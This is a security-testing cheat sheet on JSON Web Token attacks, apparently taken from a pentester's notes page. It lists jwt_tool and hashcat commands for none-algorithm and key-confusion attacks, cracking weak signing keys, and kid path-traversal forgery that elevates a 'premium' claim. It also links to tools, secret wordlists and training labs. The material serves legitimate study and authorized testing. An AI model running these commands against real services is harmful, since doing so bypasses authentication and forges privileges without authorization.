JWT Token

Burp Extension

JSON Web Tokens

Viewing the token

python3 jwt_tool.py <<JWT_TOKEN>>

Tampering with the token

python3 jwt_tool.py <<JWT_TOKEN>> -T

JWT Null Signature

Java JDKs 15 to 18 allowing to bypass signature checks

security-labs-pocs/proof-of-concept-exploits/jwt-null-signature-vulnerable-app at main · DataDog/security-labs-pocsGitHub

None algorithm attack – CVE-2015-9235

python3 jwt_tool.py <<JWT_TOKEN>> -X a

RS256 to HS256 Key Confusion Attack – CVE-2016-5431

python3 jwt_tool.py <<JWT_TOKEN>> -X k -pk <<PUBKEY.PEM>>

Crack Weak Signing Key - HS256, HS384 & HS512

python3 jwt_tool.py <<JWT_TOKEN>> -C -d <<DICT_FILE>>

GitHub - lmammino/jwt-cracker: Simple HS256 JWT token brute force crackerGitHub

HS256

hashcat -m 16500 /tmp/jwt.hash /path/to/wordlist.txt

Small list

Bug-Bounty-Wordlists/jwt-secrets.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Big list

jwt-secrets/jwt.secrets.list at master · wallarm/jwt-secretsGitHub

JWK Header Injection

Lab: JWT authentication bypass via jku header injection | Web Security AcademyWebSecAcademy

JWT Authentication Bypass via JWK Header InjectionMedium

JKU header injection

Lab: JWT authentication bypass via jku header injection | Web Security AcademyWebSecAcademy

JWT authentication bypass via jku header injection Dec 26, 2022siunam’s Website

Kid injection - Path Traversal

jwt_tool.py eyJ0<-SNIP->6tsXW4w -I -hc kid -hv '/dev/null' -pc premium -pv true -S hs512

-I: injection mode

-pc field: Field (in the payload) to modify

-pv new_value: Sets the new value of the field

-S: Signature algorithm

Lab: JWT authentication bypass via kid header path traversal | Web Security AcademyWebSecAcademy

JWT Forgery via Path Traversal | InvictiInvicti

https://www.youtube.com/watch?v=78FIFrOi4Os

Kid Out of Band

JWT kid Parameter Out of Band Command Injection | InvictiInvicti

Forge Signed Tokens

SignSaboteur - Burp Extension

Introducing SignSaboteur: forge signed web tokens with easePortSwigger Research

JWTtool - All tests

jwt_tool.py -t http://example/api/nmap -rh "Header-JWT: eyJ0<-SNIP->zw6tsXW4w" -rh "accept: application/json" -rh "Content-Type: application/json" -pd "[ \"1.1.1.1\", \"4.4.4.4\"]" -M pb -np

-t : target

-rh: Headers

-pd: Payload Data (in this example IP adresses)

-M pb: Playbook scan

-np: no pause

python3 jwt_tool.py -M at \
-t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
-rh "Authorization: Bearer eyJhbG...<JWT Token>"

-M at: All Tests

Tools

JWTtool

GitHub - ticarpi/jwt_tool: A toolkit for testing, tweaking and cracking JSON Web TokensGitHub

JWTcat

GitHub - aress31/jwtcat: A CPU-based JSON Web Token (JWT) cracker and - to some extent - scanner.GitHub

jwt-pwn

GitHub - mazen160/jwt-pwn: Security Testing Scripts for JWTGitHub

jwt-hack

GitHub - hahwul/jwt-hack: 🔩 jwt-hack is tool for hacking / security testing to JWT. Supported for En/decoding JWT, Generate payload for JWT attack and very fast cracking(dict/brutefoce)GitHub

JWTweak

JWTweakJWTweak

Resources

JWT attacks | Web Security AcademyWebSecAcademy

Hacker Tools: JWT_Tool - The JSON Web Token ToolkitIntigriti

JWT Vulnerabilities (Json Web Tokens) | HackTricks

All About JWT VulnerabilitiesMedium